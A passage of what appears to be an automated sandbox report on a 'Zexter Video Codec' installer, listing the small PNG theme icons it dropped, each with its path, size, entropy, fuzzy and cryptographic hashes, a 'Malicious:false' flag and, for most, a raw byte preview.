                                                                                                    Preview:.PNG........IHDR..............H-.....sRGB.........bKGD._._._.4.....pHYs.........B(.x....tIME........Oj....5IDAT(..IN.@........7n.....\.3@....0&2...._./..J.Tu..5.8.fQ...;......|....*...[.$..>.#..z_A.,....|;.i.^.2^...5...R..U..y.,.8<...<.-;cJ)..E.(.0.....Z.s]..B....:..1.;dud...P..D.G.J..4Ml/.l..!.3.H....q.I..H..a.....I.uK`..^ ...s...2gL..\..(h@!.....R(S...8....a...K.kAf..."V.h0...N?v..}.~..c...t$!&.lo?..z...qm....IEND.B`.

                                                                                                    C:\Users\user\AppData\Local\Zexter Video Codec\themes\gray_textured\is-KBU3O.tmp

                                                                                                    Download File
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp
                                                                                                    File Type:PNG image data, 18 x 18, 8-bit/color RGBA, non-interlaced
                                                                                                    Category:dropped
                                                                                                    Size (bytes):194
                                                                                                    Entropy (8bit):6.427379953657502
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:yionv//thPljll8llsAX81qfqjovwzflWfXb0oWhAm2KWmLk8vJvP+u3tKDhqcl1:6v/lhPW/sAXkDokflFoWhAmtW6k8ZUbp
                                                                                                    MD5:830FC62D759022DDBC665F1D8D2E9164
                                                                                                    SHA1:84FBC1F8F3770905AB365D465C956756FD62E15A
                                                                                                    SHA-256:0D0ED367EC6578DD5DB6A3637A5CFBF6DDEEB1CE12953C1DF09FEF8F8BD897AA
                                                                                                    SHA-512:B948DD792BC0379AFF1DB46A8ABFE5803005E3C5C1BC2F2ED382C4D5AF09DCCA7C8F98400B46B0C5CC1100CD492A8D1C3B90A5BE9B2C5EA2537DAA7911B3458C
                                                                                                    Malicious:false
                                                                                                    Preview:.PNG........IHDR.............V.W....IDAT8...!..a......I.h..y......U...,.@3:O..E!x/.~..h..f|.u.....4.]hc.3.....@.!v...!.+PC.k\=.A.....1...0A.*H.c..{.Qb..RTA..r.(P.@......;'...!\.....IEND.B`.

                                                                                                    C:\Users\user\AppData\Local\Zexter Video Codec\themes\gray_textured\is-LEBN0.tmp

                                                                                                    Download File
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp
                                                                                                    File Type:PNG image data, 18 x 18, 8-bit/color RGBA, non-interlaced
                                                                                                    Category:dropped
                                                                                                    Size (bytes):135
                                                                                                    Entropy (8bit):5.763983120472731
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:yionv//thPljll8llrAkxHgbcMktxY8ot4sUnG/QgjOD4l+dCKolkup:6v/lhPW/skd/Mktx+thzjOciCflkup
                                                                                                    MD5:C1E1CF920D57580A1337044D9244B41A
                                                                                                    SHA1:2713C8C06B08A204042B3BF92F6E31724E965E81
                                                                                                    SHA-256:8BFC445B29843719FB37F265F727D4E9E6F6C0814F054A6330C096022CA7995A
                                                                                                    SHA-512:87968296D3A160EEA1C3CE012300DF21CC59ED57ADE023B76E9238AE37F491B3F585663CBC4ED86A99EA1E3C4E392672E0CEA803A2641C9F05651E62240FF358
                                                                                                    Malicious:false
                                                                                                    Preview:.PNG........IHDR.............V.W...NIDAT8.c`...........(5D.....\......S.8....1D..#...QjP...A.....E^C3P....z.......g...7.....IEND.B`.

                                                                                                    C:\Users\user\AppData\Local\Zexter Video Codec\themes\gray_textured\is-MPGTT.tmp

                                                                                                    Download File
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp
                                                                                                    File Type:PNG image data, 18 x 18, 8-bit/color RGBA, non-interlaced
                                                                                                    Category:dropped
                                                                                                    Size (bytes):194
                                                                                                    Entropy (8bit):6.478660891705174
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:yionv//thPljll8llsAX81qfqjovwzflWfXbbt8i7ltydfIxDGKuQ11iEUvWK2K1:6v/lhPW/sAXkDokflSoAkpOKtMyldp
                                                                                                    MD5:88BC92E4CF3288BA93CAF398950874CD
                                                                                                    SHA1:F1B9F2C5EF5566C5BD983B5E1B3DFF17B06412F2
                                                                                                    SHA-256:258CD3545E4E4A9CF32F31FBD1AAF19869118F2B32CC8AB88C421D53F0A63D6D
                                                                                                    SHA-512:07DCA4BFC9581F425D7BAAB13E91668A0F1C832518DE7E98C0F872A305401B68B1D1C6DB56A81CF55A81E6587DD57168AF49D5676FF24C07A0BF6B0E04FADF8B
                                                                                                    Malicious:false
                                                                                                    Preview:.PNG........IHDR.............V.W....IDAT8...!..a......I.h..y......U...,.@3:O..E!x/......Q.@..9........{..b..U.0...&HQ.5........P.W ..;......hc.3.....B.}........h..f...;l^.. *.....IEND.B`.

                                                                                                    C:\Users\user\AppData\Local\Zexter Video Codec\themes\gray_textured\is-NFC4R.tmp

                                                                                                    Download File
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp
                                                                                                    File Type:PNG image data, 18 x 18, 8-bit/color RGBA, non-interlaced
                                                                                                    Category:dropped
                                                                                                    Size (bytes):128
                                                                                                    Entropy (8bit):5.703022629772099
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:yionv//thPljll8lli9uOgkBCvMibqMGuNGpNfodyfsiB1p:6v/lhPW/i9uOliMibqMGjAMkijp
                                                                                                    MD5:65B820457098F3E41079DB7B024D6911
                                                                                                    SHA1:2D35F7523C5F990B810FAD7E2DFB1E2E46DC94AB
                                                                                                    SHA-256:3CA8816EC6B9E88958D7D33C3532CE57223E5B3454D2AE329A54C964590034D6
                                                                                                    SHA-512:52FAD1A53340EE03016E6B63364EE937BBA8C1FCBC8F491011D707102100F9BFCBB62C5D0B9D3F40BF8CEF48E4E9566271019CBA10CD57C4ACFA05EF210DF4E8
                                                                                                    Malicious:false
                                                                                                    Preview:.PNG........IHDR.............V.W...GIDAT8.c`......./...0.....X.R...8..S.....(5..#.X...EQjP.4.x(.l...........g.*Uug....IEND.B`.

                                                                                                    C:\Users\user\AppData\Local\Zexter Video Codec\themes\gray_textured\is-NKO95.tmp

                                                                                                    Download File
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp
                                                                                                    File Type:PNG image data, 18 x 18, 8-bit/color RGBA, non-interlaced
                                                                                                    Category:dropped
                                                                                                    Size (bytes):193
                                                                                                    Entropy (8bit):6.5470203907323725
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:6:6v/lhPW/bkgGNdjs2jOTS3Bs077TxUVxhlup:6v/7uzkgG7Y2yU14lc
                                                                                                    MD5:8FB0652E37E5375EFBFFC85E000333EC
                                                                                                    SHA1:98DF46702AB67C5CFF30922BE409209CEA30A6B5
                                                                                                    SHA-256:90939B8E3B4A568724143D056A93CD7B5528D4841A9D11EA0A4B11C2A35A4E03
                                                                                                    SHA-512:EF67A9624AA003A77724CB90F456A84181746E585003B31AE714A2870FFB3B2F069382CD7DA464FDE6BA68C37A94AE42CCB58B80E0608D41EEF30A81260D5545
                                                                                                    Malicious:false
                                                                                                    Preview:.PNG........IHDR.............V.W....IDAT8...1..Q...Aa....R......h..~,...:..)..S.7.f...r.I...Rd...a...X..g<p...tBE3\.....&.rU^.WW..!FTF{.5....8b.>.1.o.,.O..........i......IEND.B`.

                                                                                                    C:\Users\user\AppData\Local\Zexter Video Codec\themes\gray_textured\is-OT987.tmp

                                                                                                    Download File
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp
                                                                                                    File Type:PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1442
                                                                                                    Entropy (8bit):7.754161124979248
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:oq2vym+9kVWUOASjz39hd/9uinkxIyJubx/98nDDJFPyvfCDFHTCyFm+3wTf8f4C:aqmzV9az39z9hnkx+2DfyyD9TFAAwTfI
                                                                                                    MD5:46934D3CAA685BB0DBECF20BAB8BC317
                                                                                                    SHA1:DD61BF668D265AB3FBB61C6CB6CF25778632154F
                                                                                                    SHA-256:AC57AEA1D66661974EA2922733661B27D26D3C2026321E77A2A9ACE1CDAD558C
                                                                                                    SHA-512:BCB6D969F8823196652B4093988719C9F51940890D212A0E743CC887C46BE3DAD00D95B47970F1E682F3A40E7F7216EBFD4B37626AE130FE57F7F3CEBA718AE4
                                                                                                    Malicious:false
                                                                                                    Preview:.PNG........IHDR... ... .....szz.....sRGB.........bKGD.......C......pHYs.........B(.x....tIME.......E......"IDATX.W.J,W....jm.A#>AA$......$....q.....!B.Cp..;1...p((...G=.Vyve...+...>g._....q.:..[__/.--}.....w..X.s.....y...N.EN..9.<koo.smmmknn...!V.b...OOO.8==....'........;;;}...}z..+.....vrr.8<<.........._....755.............r___G[[[+....%...z...\..T*..........Ay|||.........O...w......._utt..D{.T*.......1H..;.Z-......u......?........../....J.......m....F.=D+Rk.....PP.\..Ix....Z?;;.666...}.xW.{Z\...j....c...X1..zm.>..y.!...S.u.....o=l..n..._.f....R..P.."....~..8......l..`.;..B\........>.A...7..Q.F..4..=./.B.......eY..$.<..r....A..$.$.<.`)...........C...V...8.......^.....D&........r..Y9.K.....8..C.....%.UV;*....^. .d.....v. ......M...X..M..zR...H...'..'._dS..P.?..2S.MT......4$.....k...=.eL.^z.....X.e+.......$..sG..qm.vB.........&..I..+W....Q. ,.M.+.-Q..$<!.t....wi.rA..(v.kW..&.p.-.(..u+.j.5.y.....2N.....0....kW....5.y).J1. xDW...x..0.d.p.\S.d......l

                                                                                                    C:\Users\user\AppData\Local\Zexter Video Codec\themes\gray_textured\is-P4M1F.tmp

                                                                                                    Download File
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp
                                                                                                    File Type:PNG image data, 14 x 14, 8-bit/color RGBA, non-interlaced
                                                                                                    Category:dropped
                                                                                                    Size (bytes):434
                                                                                                    Entropy (8bit):7.191504491746101
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:12:6v/7iIGMfbllDGOEGFo+bciyq44LnHolz:HSbHCOEUo/W4EHa
                                                                                                    MD5:7E5A76C4CF167C7549FAD937DC8B3DA3
                                                                                                    SHA1:7BDBE8BE6737C51C292AA8F51F9586DB0432AB39
                                                                                                    SHA-256:77D9DBC6CC93882EEC1BA969D14AD6C0FDEFE35302F0F930751C4B5BAED2ABFE
                                                                                                    SHA-512:30D230F3F7A62425D92B5227D482E000741C34769BB88CB0F4EDABA782D3834892D9C0A1BC4468DA667951FF489453FD2B3B426ADC38BF6BA5EA34CEEACCC077
                                                                                                    Malicious:false
                                                                                                    Preview:.PNG........IHDR..............H-.....sRGB.........bKGD._._._.4.....pHYs.........B(.x....tIME........A.....2IDAT(...j.@...O..b......l..>....v..U.....X.t.L....x.{.Q.n....A.m/).jG-..)..~....2-...Ey..jQY....u=4Mcr......<.i..7.....*.....(..s..i....*.+.......!...^V.v.. .f..b1H..E.Yh.w.........7..$...5..R.....f.~.T.l+..^.<.....'&I.1..pG'...i...d2.0...DQt..Yny.".`]....%@.)?L;.u..........yK.....s~.}...?.8.Ty2y.....IEND.B`.

                                                                                                    C:\Users\user\AppData\Local\Zexter Video Codec\themes\gray_textured\is-PJA7I.tmp

                                                                                                    Download File
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp
                                                                                                    File Type:PNG image data, 14 x 14, 8-bit/color RGBA, non-interlaced
                                                                                                    Category:dropped
                                                                                                    Size (bytes):502
                                                                                                    Entropy (8bit):7.307082621377148
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:12:6v/7iIGMf2H5kGLptWrJMNbLtUWrPwIfYSA2go4aOq07:HS2H6G16JEbSuff8hnaOq07
                                                                                                    MD5:9BBFAFFA43A8745739977748E1680DAB
                                                                                                    SHA1:A2DE96CC6B8D6A22F2E517ED8828A0E65769C6EB
                                                                                                    SHA-256:EAD5682AA1875AC0664177D32B817A0BE555B90AABB88DD8FA914FAF42125896
                                                                                                    SHA-512:3E1E77835D3786D1FFAE02EAEFD41FEF7BD55955F08806C176A5E5A06169029F07E194D001927E5AEAD066FA41C90CA1B41E354F274C3AA1C6A78EF0E37717E1
                                                                                                    Malicious:false
                                                                                                    Preview:.PNG........IHDR..............H-.....sRGB.........bKGD..............pHYs.........B(.x....tIME.....2...i....vIDAT(S.RKj.Q.4..=....*.h.......].....y...E.j.O.....d.,.7..._.......`0.....p8|...}[..H......t..j...l`.6F....2G..x.D.7...^..8......d..{e%..H$.\...x..j..~....B.R..d......}d2.d.Y..u,..l.[.v;....P(.4..D..+^....<.."..*.g..Q.Z..r...4!E>..LT*....n..l4.*FQ..VI.....&..........eYOVM6...@....5...L.T*.J...p.rq..=."p2.`6.a:.....I5.s........I..\.@..F....rB.b..I....'...r..O...{7.\....IEND.B`.

                                                                                                    C:\Users\user\AppData\Local\Zexter Video Codec\themes\gray_textured\is-Q1BS7.tmp

                                                                                                    Download File
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp
                                                                                                    File Type:PNG image data, 18 x 18, 8-bit/color RGBA, non-interlaced
                                                                                                    Category:dropped
                                                                                                    Size (bytes):206
                                                                                                    Entropy (8bit):6.093633689706192
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:6:6v/lhPW/f19VNtTlMGBSCghX2AGBIcDV6fr66Vp:6v/7uTVPTChXCBN8fJ7
                                                                                                    MD5:2DE4E41A0E31A4C0FBB2D7FC3CBC31CE
                                                                                                    SHA1:0704F540352C579647D28E5E7821D7CA7FCC6613
                                                                                                    SHA-256:FBEC4D0BC6ED3DFDADADFFD10EB9F04058DFC11E7248DD73814E7806E58795FA
                                                                                                    SHA-512:FE60C53AADB80B6B922E17B822710A6820046C07D2742694BDF3019DD025EB8ABF4366849BE789E122B7053D5B7798D1CEAA9A296C3D007C557D95CDFFEC0115
                                                                                                    Malicious:false
                                                                                                    Preview:.PNG........IHDR.............V.W....bKGD..............pHYs...........~.....tIME...../..v[....[IDAT8.c...?.50.A.o.../...hx)T.h.x....Lp..yI..?..D2......F.@....P1..[.....C ..4...m4A.G..F...=.G....IEND.B`.

                                                                                                    C:\Users\user\AppData\Local\Zexter Video Codec\themes\gray_textured\is-R4L4S.tmp

                                                                                                    Download File
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp
                                                                                                    File Type:PNG image data, 14 x 14, 8-bit/color RGBA, non-interlaced
                                                                                                    Category:dropped
                                                                                                    Size (bytes):556
                                                                                                    Entropy (8bit):7.316549998180671
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:12:6v/7iIGMf2H9fw3E/3lkWcxh66ScOaqgx531nDqLwzIdjzRvL77:HS2H9YU/eWIfScvbnDzzchvLH
                                                                                                    MD5:E4118A159AC2AAB1876E440CF770CA3D
                                                                                                    SHA1:27A28242395D33530A955D2D6FE479A9D45DB0CC
                                                                                                    SHA-256:08268FF255BFD01B6AA0184ECD06B5A0C48D016BC429D3B155B7149A8CD10FDF
                                                                                                    SHA-512:611EAC1EB04097730CD7B8D9C52FF7DA5D2F741E8C4A54F291C0137B75DD326F42CF35AEDBDB17D153BA20845904BE9F1F3753069B36D3050E907FA5C3D3461A
                                                                                                    Malicious:false
                                                                                                    Preview:.PNG........IHDR..............H-.....sRGB.........bKGD..............pHYs.........B(.x....tIME.....0;..]....IDAT(SmR-o.A....;.8.5.....T..V`+....6.....L-..... ...Q........L2...y3ogF;..BI.Rq5M{.u.t8...3......{..j3..) @O.|$...b..q..z.......F3$x....$.4..l6...[.B..<...R4..E....k.r.E.^.X.K..b...|...J0..F.g..y&.TM&.n>.......).@[Uv.Gx...z...G)..X.hT.-,...XL...V....\.g.W....).. ."..<..Z.N.j.d..a...D..8).L.`...b.F{0.<b..A0.DUB.J:..I.mr.....t-f..V+.d...|.....n~....g.....~NW.'...t:c.....R)....(.d..v.`...V...e.f.!........)...[..-./..._x=t<....IEND.B`.

                                                                                                    C:\Users\user\AppData\Local\Zexter Video Codec\themes\gray_textured\is-T1J4J.tmp

                                                                                                    Download File
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp
                                                                                                    File Type:PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1497
                                                                                                    Entropy (8bit):7.768741056434717
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:oqyoicsCo1Rd3ASFaaFX4FumgLpc8ut4qzrtpei0AF3BkNmhqCTEOU:eznTR3YaFXSiut4qzrtbeNmhTE7
                                                                                                    MD5:F860FF3693F12371577E33808AEA17E7
                                                                                                    SHA1:10EA223E855685506460EA8C3FC9427350CAA1E2
                                                                                                    SHA-256:B8714DCC43D031A602E3C560EBB1A07C1A892AB84E34F06EDEB03B59FEB09BD6
                                                                                                    SHA-512:6A6307796F6C6D5FEC3A0B4168DCAD5E6B15008D5CC247B562ECE25E25B87AC40ECB372038E351674FC75AB391CA23E47B8DF1966D2849DC3DD0ADFFB7CEFA62
                                                                                                    Malicious:false
                                                                                                    Preview:.PNG........IHDR... ... .....szz.....sRGB.........bKGD.......C......pHYs.........B(.x....tIME......3...g...YIDATX.W.N#G.....`.......6........O&.b..@......`....J..)... ...0..Q9..n..1.LK.vwW.s...q. .x.........~.+..V...C..G.....4M.,.B.^.......w...1.}.33X....z....[,Jfgg........Z.R..'..y18@I.G....www...u...6ZYY.....w,KH.....nnn.....[\\lLLL.7..z.........$.,.3~||.......uOOO....{.........................1..XkC...}...D..M`.n..i...6dvNNN.9::........j..[.sssMX.I.........~B...`.(.....n...^]]].......hdd.k...o...rp~Lp.....%..*G.$.k4..\...6..:..._X...Yz.J0..`ll..).R..(...s... C.....J...0+x6m.A.J...X90L..~.i.H.(..?....`....|...}.......*d.>...v G.9....AR.W...H.$......H.i..?.)..<..)..Ps..<.x.....Lc........E}.,.30.5.p.........$.Et....\E...!.Fd...e......5.Q..s.I.B&.}..#.@..j.E..d..... `h=QL[..2..+..M.C.....k.s.i.I.3..+r.Z]..G|$..U..!..........{..J...T....K..e..1.e..[EY+.(T.T.<!.Y.I.....O.x.\L..^c..FHH.S........F4.f.{....S.....*eS. ..4....(...eQ.|9.....!.R4.X.+.<..!..

                                                                                                    C:\Users\user\AppData\Local\Zexter Video Codec\themes\gray_textured\is-U6JS8.tmp

                                                                                                    Download File
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp
                                                                                                    File Type:PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1555
                                                                                                    Entropy (8bit):7.796645823149652
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:oqhLS0rCCBSazjoXK2RM1EpIuNF0piVLDlZLfciK3ZCHBJW:VjrBBSFXKP1ECuNF0piVLDlBfcOM
                                                                                                    MD5:486390A2CE5B4CC1393AC254780A7C7C
                                                                                                    SHA1:4305181EC1910A666A47C3715D27F5CA6991D688
                                                                                                    SHA-256:AB3BDFDFEED5743FD4AF47B0BA6AAAD914661DCE381A6FF8C8C8994363F83909
                                                                                                    SHA-512:F3F6051BA679C6F329A18E97F12CB6FFD9ED18D0F054C79ED9F2FB5D23F0484A12DB0FD16CD47F52B67E3D617F9BE728F9BECC850CF6A61FE9B74ED9701C2DD1
                                                                                                    Malicious:false
                                                                                                    Preview:.PNG........IHDR... ... .....szz.....sRGB.........bKGD.......C......pHYs.........B(.x....tIME......._......IDATX.WIO#G...+;.Ab.@B$...&...Q.?B2Q...[...8!qEB......bK.....-!..n.....Twlfh.T.v....Wv...eY....Fjiii.R.|..T*.:..a.^.@.U..Z.......~yyy{vv....F.."..NOO....z...S...+....:;;. ...n</....^.xx(_^^.'''.;...mmm..eU...^....011....L.......-...y..Vx...}...A.X,...>..............G....|?99.077.=00.......L&..h._..e..*..U(X....w......w...?.;;;_.........`_www[___..@.Q.H.O..........$,..r.J.P.nnnV..{....{j.....B@..c....!....u....C"P4M.b...V`./<,|.....t...J6...^...H.3..-m.}..5..)..A.0.-Z...!.......V....".:....Y#..z$^H.......eZBa.[..cXd....P:f.P>.&...<....-..v.2..J..DV-.5..i.Z....F....u E.%9...(p....Bpu...Gp...P.]..j.....U..i.!b...*..I.NF(.5.."-.n..L.V.1I.L.D>-..2..Ih..}.J*.`;.......u..*..0..=CC+.P.B.i.@...+..............:1....N%.M<e.....XAUF.W.Sb.M.f.=G...*.be..j.'/...$#.H..0...^......=..u.1s7.B......L....RO.L.Y....T....].Lk..SS..I(..4.Lwf.3N...=...sF#..o9.MK."`...

                                                                                                    C:\Users\user\AppData\Local\Zexter Video Codec\themes\gray_textured\is-UHUEJ.tmp

                                                                                                    Download File
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp
                                                                                                    File Type:PNG image data, 14 x 14, 8-bit/color RGBA, non-interlaced
                                                                                                    Category:dropped
                                                                                                    Size (bytes):636
                                                                                                    Entropy (8bit):7.494209461570772
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:12:6v/7iIniUpZVqDOd94j4MwzQPlA89rnKP69TRUQMGsVc7:giUpXjBMwMPlA8BZ9OFGsk
                                                                                                    MD5:FE02DBEC1FBF19F2525E9C87E3023C7C
                                                                                                    SHA1:9503756A6C1CB9C742B6852F121B6D8092C06578
                                                                                                    SHA-256:CB2D73D2E08790836F67F4CCA213206C071F2215D65CCD0099EDD2B9A912B578
                                                                                                    SHA-512:CADBCCEE87CB20DA46E1E4BD9241EE22CF7BA6DE9B8ECAD2D1F3831A8AAE5D0061663F57815BCA19F2580C824EC599891726A240292E6AB289013A6AE971E2A0
                                                                                                    Malicious:false
                                                                                                    Preview:.PNG........IHDR..............H-.....sBIT....|.d.....pHYs.........B(.x....tEXtSoftware.www.inkscape.org..<.....IDAT(.U..k.A.....^.W.Mj*.D.P.^..._. .BJJ.h.....Kv...&B..............H.....6..1.22s..t:............4=.......#.#\]..s......./.....t..{;.....+<y|.4=Dr..(*....>..d.]7h>8.{yT...N.........m...c...NO.X....V...F.7. ....n.io.n...I.T.2..F....q+`..$.0...!...P.{U`..1...'.J..B.w..1.!...<...J..[.........j...A.<.c...A~...R.Z<...85@.KI\....1..m........\v....FU....`.T.e.#......_`.rC].s^.S.r]W... _.C.Cu...ju.....5._...P....r..^A.r\^|.$y...&..<......y.e..s\.....dc.....!O..qE.h...I..s..Z...?...4f%......IEND.B`.

                                                                                                    C:\Users\user\AppData\Local\Zexter Video Codec\themes\gray_textured\is-V07B0.tmp

                                                                                                    Download File
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp
                                                                                                    File Type:PNG image data, 18 x 18, 8-bit/color RGBA, non-interlaced
                                                                                                    Category:dropped
                                                                                                    Size (bytes):139
                                                                                                    Entropy (8bit):5.9354638900987355
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:yionv//thPljll8ll3MOgkBQTBlH/DVgPMWwnPUmLdeAkhBsF6c4V1B/0wXjp:6v/lhPW/cOlcBZKkWoLdePhq2BcwTp
                                                                                                    MD5:5EACCA1FC3A11F7E844B3809D9CAA537
                                                                                                    SHA1:86AF79F715B3921E507068558EEDC94EAAC677C6
                                                                                                    SHA-256:57A9751B8A85FD13C3F0C9EEAEB3B905D7B8802779EFE407E13444468A15C396
                                                                                                    SHA-512:997D5D631FF90CAD01D1613A347BF2C1F9D0723AF29A5CA52494BBEF97F4FA50040B171FD371F8A8FD31DDA2933EF0752ABC3056625A9DB747BC5E24EB6F7CD2
                                                                                                    Malicious:false
                                                                                                    Preview:.PNG........IHDR.............V.W...RIDAT8.c`...........0h)._..` f....!...P9J....@.F.....;%....@,EI`..b.J....<..a.....z...l....IEND.B`.

                                                                                                    C:\Users\user\AppData\Local\Zexter Video Codec\themes\gray_textured\is-VKGD0.tmp

                                                                                                    Download File
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp
                                                                                                    File Type:PNG image data, 14 x 14, 8-bit/color RGBA, non-interlaced
                                                                                                    Category:dropped
                                                                                                    Size (bytes):641
                                                                                                    Entropy (8bit):7.486329990930914
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:12:6v/7iIGMf2HcHsH4mHgE42VgbsrP2eByHKk8a4JLk++8/1:HS2H8mJJfIsrueEq9z+c1
                                                                                                    MD5:752E6CDC2C92BF4D22712F33A380CB93
                                                                                                    SHA1:07AC399AD6C9F72E97A1304E1324AD20EB42F633
                                                                                                    SHA-256:3294FEF8285A13B09967D3F631F8CE52C2AACC9A07604CD51B70811BED2ED40E
                                                                                                    SHA-512:9DC2C06873DE889B4E26AA9890B93E6FD37D04C73801865861FA46B95C2011BFEEC94B24F37BBD376C43E993FEE58D1C4A221AF09346CE70AF86BF379BD6CCA2
                                                                                                    Malicious:false
                                                                                                    Preview:.PNG........IHDR..............H-.....sRGB.........bKGD..............pHYs.........B(.x....tIME.....1*........IDAT(Se..k.A...|.n...n..T.%&X.....7.d_.".KA..T.J..Z.....w6D..e.e...=s......S.x..G=.....8"S.%/..|.....8=y1....:2...;.B.(K.I.W.kE../>....Z.r?.7<.~....t...BJ.i../.J...tz......7..!.J,.#..v.....9.Y....YQ....?|t............$V.@....zp...;!TU.M.......A..N.....[..V...&....9..xm..d2F.m..`.N......&.A.DU.....y.4....4....`8...\.|...y...q.]^~......@qXor....Ik..3.@+..V~d...........?7k...`.C.P.ZT.....QF-E.{..+5!... .6..(.i..`m....._~..e.n5.`0..z...Qr..IF.E..9Y.....r~ [.@8...k2*...$....n...orX'#..&........X....IEND.B`.

                                                                                                    C:\Users\user\AppData\Local\Zexter Video Codec\themes\gray_textured\null.png (copy)

                                                                                                    Download File
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp
                                                                                                    File Type:PNG image data, 8 x 8, 8-bit/color RGBA, non-interlaced
                                                                                                    Category:dropped
                                                                                                    Size (bytes):69
                                                                                                    Entropy (8bit):4.258998795700668
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:yionv//thPlv5hrl6hJbF/k3ollkup:6v/lhPZcJq4ldp
                                                                                                    MD5:A7204A9D9C26A12DD3C0B069EFD8ACAC
                                                                                                    SHA1:5E1E54C75D7D83147DD57DCCBCC5302D1798B21E
                                                                                                    SHA-256:FA56F736618C032485F27BA183FF0D5226006E2080CF20813AF1C6A7B93F4AA3
                                                                                                    SHA-512:7401056BE66AE9CDAF9EFEF6DBA0F96384964DA491F538C35C283419EE819F767D6BFC601E2FEF8445FA25A447A5550C6CD8986330329981B852940EC334F08F
                                                                                                    Malicious:false
                                                                                                    Preview:.PNG........IHDR.....................IDAT..c..`.......%......IEND.B`.

                                                                                                    C:\Users\user\AppData\Local\Zexter Video Codec\themes\gray_textured\pbtroughh.png (copy)

                                                                                                    Download File
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp
                                                                                                    File Type:PNG image data, 14 x 14, 8-bit/color RGBA, non-interlaced
                                                                                                    Category:dropped
                                                                                                    Size (bytes):333
                                                                                                    Entropy (8bit):6.65458733329839
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:6:6v/lhP6IcHMRfCCllSJPwlzkv8z8zKWHCB9mowuVIRmCtIyWDoKby2Fb/67YEFp:6v/7iIGMfbllL5zMKWHCBBIRwyW0KbzG
                                                                                                    MD5:16CE13BC8208F1C0B9422FFAFBC46C6E
                                                                                                    SHA1:FB6B11EE39E0143A056385B25761FCB0E9ED980B
                                                                                                    SHA-256:1EC3BD426CCE1B1BD23664ADCC11FE51D04DE791FADB6A731DE7EB5076B26163
                                                                                                    SHA-512:46EB74547599EED50ED554DCAD5567198D20AAEF7B8D0F2F22E1912224F381F91F5501E4985B007945FC5D4A12B85ED0E06184168F6EE614135C8AFAE13334A5
                                                                                                    Malicious:false
                                                                                                    Preview:.PNG........IHDR..............H-.....sRGB.........bKGD._._._.4.....pHYs.........B(.x....tIME......'.i.h....IDAT(.c`..@VV.WNN.]FF.WJJ.OZZ...............Z...B..Alsss.SSS......,CCC..$.q``.\XX.5N.UUU......pII..N.3g.4....'N.h.S..;U.]+..hXf...j85>~....+j.O..>~..$......8s..+....?..?..{'...{./_.H.}.y..0.15c..B......IEND.B`.

                                                                                                    C:\Users\user\AppData\Local\Zexter Video Codec\themes\gray_textured\pbtroughv.png (copy)

                                                                                                    Download File
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp
                                                                                                    File Type:PNG image data, 14 x 14, 8-bit/color RGBA, non-interlaced
                                                                                                    Category:dropped
                                                                                                    Size (bytes):324
                                                                                                    Entropy (8bit):6.776590990847706
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:6:6v/lhP6IcHMRfCCllSP7k0Rt64huUPOfsIuDRWi9I1z2He4hsCvJgVm/kup:6v/7iIGMfbll8g0RciuU2fy9I1zg3lJP
                                                                                                    MD5:389BCEA15865028B56A0A70C87E13DCA
                                                                                                    SHA1:B771E6A3E73B2B3E4B440B2E59D98E9D7F3B60C7
                                                                                                    SHA-256:5CAA4636ADE7C9B36E257D1AB01D06FDA59310781F4C1E5B527342D5DD8B8DE3
                                                                                                    SHA-512:BDD82387E62B1726B402B1BE8B87CD2BF02C794A77525E4780A96DAE71E6CBF5F17261706A161A7AE1FDB8F15542DD2A3046ABE0A3328B5139C99F9F9CDDDFA3
